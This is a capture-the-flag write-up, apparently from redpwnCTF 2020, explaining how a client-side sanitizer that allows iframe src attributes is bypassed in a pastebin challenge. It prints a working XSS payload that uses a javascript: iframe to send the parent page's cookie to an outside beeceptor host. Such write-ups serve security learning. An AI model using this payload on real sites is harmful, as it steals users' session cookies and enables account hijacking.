Rating:

This seems to be similar to web/static-pastebin, with the exception that we can add few HTML tags and attributes, Digging into the souce code reveals this 'sanitize' function which performs client side sanitization of input txt

```
function sanitize(element) {
const attributes = element.getAttributeNames();
for (let i = 0; i < attributes.length; i++) {
// Let people add images and styles
if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) {
element.removeAttribute(attributes[i]);
}
}

const children = element.children;
for (let i = 0; i < children.length; i++) {
if (children[i].nodeName === 'SCRIPT') {
element.removeChild(children[i]);
i --;
} else {
sanitize(children[i]);
}
}
}
```
From the script, we understand that we can have any tag, ( except <SCRIPT> as it gets removed ), and few attributes Sending the same payload as before won't work because onerror attribute is not allowed.

Playing around with it , I found that iframes with src attribute are possible.

`<iframe src="javascript:alert(1)">`
For extracting the cookie, I wrote the following payload, which redirects the iframe to a known URL with the parent sites cookie in query string

`<iframe src="javascript:document.location='https://anandu.free.beeceptor.com/?c'+this.parent.document.cookie+'>'"></iframe>`
And we get the flag as flag{wh0_n33d5_d0mpur1fy}

Original writeup (https://anandu.net/blog/redpwnctf2020-writeup/).